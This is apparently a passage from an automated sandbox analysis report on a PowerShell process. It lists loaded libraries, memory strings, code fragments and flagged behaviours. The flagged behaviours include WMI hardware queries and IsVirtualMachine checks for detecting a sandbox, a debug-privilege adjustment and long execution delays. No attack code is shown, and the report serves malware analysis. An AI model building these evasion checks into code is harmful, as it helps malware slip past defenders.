Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: System.Management.Automation.pdb` source: powershell.exe, 00000000.00000002.137613990114.00000230FB7B3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbicrosoft Irelandq source: powershell.exe, 00000000.00000002.137613990114.00000230FB761000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: t.Automation.pdbdb@8 source: powershell.exe, 00000000.00000002.137612256906.00000230FB630000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.137610309046.00000230FB280000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.137613990114.00000230FB761000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.137610309046.00000230FB280000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.137612256906.00000230FB630000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.137613990114.00000230FB7B3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000000.00000002.137612256906.00000230FB630000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.137613990114.00000230FB7B3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.137612256906.00000230FB6E4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.137613990114.00000230FB7B3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.137612256906.00000230FB6E4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb.ps1 source: powershell.exe, 00000000.00000002.137612256906.00000230FB6E4000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFBEA6DD2A5 pushad ; iretd 0_2_00007FFBEA6DD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFBEA7FFCD2 push E95F4D49h; ret 0_2_00007FFBEA7FFE19
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFBEA7F2313 pushad ; iretd 0_2_00007FFBEA7F232D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFBEA7F00BD pushad ; iretd 0_2_00007FFBEA7F00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFBEAA6003A push eax; iretd 0_2_00007FFBEAA60053
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFBEAA6A582 pushad ; ret 0_2_00007FFBEAA6A661
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFBEAAACAD5 push es; retf 0000h0_2_00007FFBEAAACAD9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFBEAAA103E pushad ; ret 0_2_00007FFBEAAA1069
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFBEAAA003A push eax; iretd 0_2_00007FFBEAAA0053
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFBEAAA84D8 push eax; retf 0_2_00007FFBEAAA84D9

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9916Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: powershell.exe, 00000000.00000002.137613990114.00000230FB761000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <!-- IFRpbWUtU3RhbXAgUENBIDIwMTAwDQYJKoZIhvcNAQEFBQACBQDk2nlVMCIYDzIw -->
Source: powershell.exe, 00000000.00000002.137573925356.00000230E1259000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine
Source: powershell.exe, 00000000.00000002.137573925356.00000230E1259000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: booleanIsVirtualMachine
Source: powershell.exe, 00000000.00000002.137575649447.00000230E3A76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine@N
Source: powershell.exe, 00000000.00000002.137613990114.00000230FB761000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IsVirtualMachineMSFT_MpComputerStatusMSFT_MpComputerStatusH
Source: powershell.exe, 00000000.00000002.137613990114.00000230FB7B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll_
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
